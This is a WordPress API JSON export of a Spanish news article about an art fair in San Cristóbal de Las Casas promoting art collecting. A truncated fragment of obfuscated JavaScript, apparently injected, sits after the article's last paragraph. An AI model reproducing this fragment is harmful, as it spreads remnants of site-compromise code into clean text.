{"id":7049,"date":"2022-11-29T04:44:15","date_gmt":"2022-11-29T04:44:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7049"},"modified":"2022-11-29T04:44:16","modified_gmt":"2022-11-29T04:44:16","slug":"con-arte-en-chiapas-buscan-promover-el-coleccionismo-de-obras","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7049","title":{"rendered":"Con \u201carte en Chiapas\u201d buscan promover el coleccionismo de obras"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-28-at-16.57.02-1024x768.jpeg\" alt=\"\" class=\"wp-image-7050\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-28-at-16.57.02-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-28-at-16.57.02-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-28-at-16.57.02-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-28-at-16.57.02.jpeg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Rafael P\u00e9rez y Antonio Ram\u00edrez, dos de los organizadores de la Feria del Arte Chiapas que se realizar\u00e1 del 1 al 4 de diciembre en esta ciudad, dijeron busca promover el coleccionismo de obras y al mismo tiempo impulsar la econom\u00eda del sector art\u00edstico que cuenta con muy poco apoyo institucional y adem\u00e1s se ha visto muy afectado por la pandemia del Covid-19.<\/p>\n\n\n\n<p>\u201cEstamos invitando a los artistas, hay conferencias de buen nivel y gratuitas, queremos que empiece a generarse el coleccionismo de arte, porque cuando se compra una pieza se cree que es un gasto, pero queremos que sean conscientes que es una inversi\u00f3n, cada pieza va creciendo su costo con el tiempo y adem\u00e1s se est\u00e1 apoyando a un sector que no tiene incentivos econ\u00f3micos\u201d, dijo Antonio Ram\u00edrez.<\/p>\n\n\n\n<p>En entrevista se\u00f1al\u00f3 que uno de los principales objetivos es visibilizar la comunidad art\u00edsticas chiapaneca, \u201ces un evento b\u00e1sicamente para promover la obra de los chiapanecos por medio de la venta, necesitamos crear un mercado de arte, es una exposici\u00f3n, habr\u00e1 m\u00e1s de 500 obras pero adem\u00e1s habr\u00e1 conferencias, y un homenaje importante a Reynaldo Vel\u00e1zquez\u201d.<\/p>\n\n\n\n<p>Reconoci\u00f3 que cuentan con el apoyo del Consejo Estatal para la Cultura y las Artes (Coneculta), pero es un evento no gubernamental, \u201chay una gran variedad de precios de las obras, cer\u00e1mica, fotograf\u00eda, pintura, la gente tiene esa idea de que el arte no es para todos o es caro, o para los ricos, intelectuales, es para todos, el grabado por ejemplo son copias de una obra original que puede estar a partir de los 300 pesos, entonces es una buena ocasi\u00f3n para iniciarse en el coleccionismo de arte\u201d.<\/p>\n\n\n\n<p>Por su parte, Rafael P\u00e9rez director adjunto de la Feria de Arte Chiapas se\u00f1al\u00f3 que buscan que las ediciones anteriores sea un escaparate para que puedan exhibir sus obras artistas chiapanecos y en otras partes del pa\u00eds, \u201cse hab\u00eda hecho en tres ediciones 2008, 2009, 2011 tuvimos una pausa de varios a\u00f1os pero ahora retomamos esta cuarta edici\u00f3n, para ofrecer obras a coleccionistas, a galeristas\u201d.<\/p>\n\n\n\n<p>\u201cLa magna exposici\u00f3n va ser en el Centro Cultural del Carmen van a estar presentes m\u00e1s de 100 artistas pl\u00e1sticos para ofrecer su obra, vienen chiapanecos, Tuxtla, San Crist\u00f3bal, algunas comunidades ind\u00edgenas y de otras partes del pa\u00eds y artistas extranjeros. Nosotros queremos que esta feria se haga cada a\u00f1o, queremos que la ciudad se convierta en un punto art\u00edstico y el turismo venga el arte que se est\u00e1 produciendo\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Rafael P\u00e9rez y Antonio Ram\u00edrez, dos de los organizadores de la Feria del Arte Chiapas que se realizar\u00e1 del 1 al 4 de diciembre en esta ciudad, dijeron busca promover el coleccionismo de obras y al mismo tiempo impulsar la econom\u00eda del sector art\u00edstico que cuenta con muy &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7050,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7049","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7049","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7049"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7049\/revisions"}],"predecessor-version":[{"id":7051,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7049\/revisions\/7051"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7050"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}